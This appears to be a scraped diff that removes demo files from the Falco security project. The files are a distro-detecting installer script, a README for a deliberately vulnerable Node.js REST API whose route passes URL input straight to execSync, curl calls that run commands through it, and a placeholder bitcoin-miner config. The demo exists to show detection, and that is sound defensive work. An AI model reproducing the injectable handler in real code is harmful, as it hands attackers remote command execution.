-	echo "*** Installing my-software"
-	# An apt-get -qq -y install my-software command would normally be here
-
-	echo "*** my-software Installed!"
-}
-
-function unsupported {
-	echo 'Unsupported operating system. Please consider writing to the mailing list at'
-	echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
-	echo 'installation.'
-	exit 1
-}
-
-if [ $(id -u) != 0 ]; then
-	echo "Installer must be run as root (or with sudo)."
-#	exit 1
-fi
-
-echo "* Detecting operating system"
-
-ARCH=$(uname -m)
-if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
-	unsupported
-fi
-
-if [ -f /etc/debian_version ]; then
-	if [ -f /etc/lsb-release ]; then
-		. /etc/lsb-release
-		DISTRO=$DISTRIB_ID
-		VERSION=${DISTRIB_RELEASE%%.*}
-	else
-		DISTRO="Debian"
-		VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
-	fi
-
-	case "$DISTRO" in
-
-		"Ubuntu")
-			if [ $VERSION -ge 10 ]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		"LinuxMint")
-			if [ $VERSION -ge 9 ]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		"Debian")
-			if [ $VERSION -ge 6 ]; then
-				install_deb
-			elif [[ $VERSION == *sid* ]]; then
-				install_deb
-			else
-				unsupported
-			fi
-			;;
-
-		*)
-			unsupported
-			;;
-
-	esac
-
-elif [ -f /etc/system-release-cpe ]; then
-	DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
-	VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
-
-	case "$DISTRO" in
-
-		"oracle" | "centos" | "redhat")
-			if [ $VERSION -ge 6 ]; then
-				install_rpm
-			else
-				unsupported
-			fi
-			;;
-
-		"amazon")
-			install_rpm
-			;;
-
-		"fedoraproject")
-			if [ $VERSION -ge 13 ]; then
-				install_rpm
-			else
-				unsupported
-			fi
-			;;
-
-		*)
-			unsupported
-			;;
-
-	esac
-
-else
-	unsupported
-fi
--- a/examples/nodejs-bad-rest-api/README.md
+++ b/examples/nodejs-bad-rest-api/README.md
@@ -1,66 +0,0 @@
-# Demo of falco with bash exec via poorly designed REST API.
-
-## Introduction
-
-This example shows how a server could have a poorly designed API that
-allowed a client to execute arbitrary programs on the server, and how
-that behavior can be detected using Sysdig Falco.
-
-`server.js` in this directory defines the server. The poorly designed
-API is this route handler:
-
-```javascript
-router.get('/exec/:cmd', function(req, res) {
-    var output = child_process.execSync(req.params.cmd);
-    res.send(output);
-});
-
-app.use('/api', router);
-```
-
-It blindly takes the url portion after `/api/exec/<cmd>` and tries to
-execute it. A horrible design choice(!), but allows us to easily show
-Sysdig falco's capabilities.
-
-## Demo architecture
-
-### Start everything using docker-compose
-
-From this directory, run the following:
-
-```
-$ docker-compose -f demo.yml up
-```
-
-This starts the following containers:
-
-* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
-* falco: will detect when you execute a shell via the express server.
-
-### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
-
-Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
-
-```
-$ curl http://localhost:8181/api/exec/ls
-
-demo.yml
-node_modules
-package.json
-README.md
-server.js
-```
-
-```
-$ curl http://localhost:8181/api/exec/pwd
-
-.../examples/nodejs-bad-rest-api
-```
-
-### Try to run bash via `/api/exec/bash`, falco sends alert.
-
-If you try to run bash via `/api/exec/bash`, falco will generate an alert:
-
-```
-falco          | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
-```
--- a/Show More
+++ b/Show More
				`@@ -1 +0,0 @@`
				`{"config": "some-bitcoin-miner-config-goes-here"}`